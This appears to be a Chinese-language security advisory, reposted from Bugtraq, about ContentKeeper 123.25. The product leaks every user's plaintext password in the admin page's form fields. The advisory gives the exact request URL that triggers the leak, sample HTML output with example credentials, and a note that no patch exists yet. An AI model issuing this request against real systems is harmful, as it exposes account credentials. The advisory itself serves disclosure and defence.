受影响系统：

ContentKeeper Technologies ContentKeeper 123.25

描述：

---

BUGTRAQ  ID: 20152

ContentKeeper是一款先进的Internet内容过滤器，允许组织监控和管理对Internet资源的访问。

ContentKeeper在保存处理用户的口令时存在漏洞，远程攻击者可能利用此漏洞非授权获取帐号信息。

管理员可以通过浏览器管理ContentKeeper的前端。由于ContentKeeper没有哈希加密已有的用户口令，因此用户可以通过请求管理页面导致将每个帐号的明文口令注入到FORM元素的口令输入框中并返回给客户端。

<*来源：Patrick Webster （pwebster@ausgeo.com.au）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=115894801105545&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

https://contentkeeperbox/cgi-bin/ck/changepw.cgi

该请求会返回所有用户详细信息，如对于口令为it_isAs3cret的root用户：

  <form>
  <input name="username" type="text" value="root">Username:
  <input type="password" name="password" value="it_isAs3cret">Password:
  ..
  <input name="username" type="text" value="rootBackup">Username:
  <input type="password" name="password" value="IamF0rgetful">Password:
  </form>

建议：

---

厂商补丁：

ContentKeeper Technologies
--------------------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.contentkeeper.com/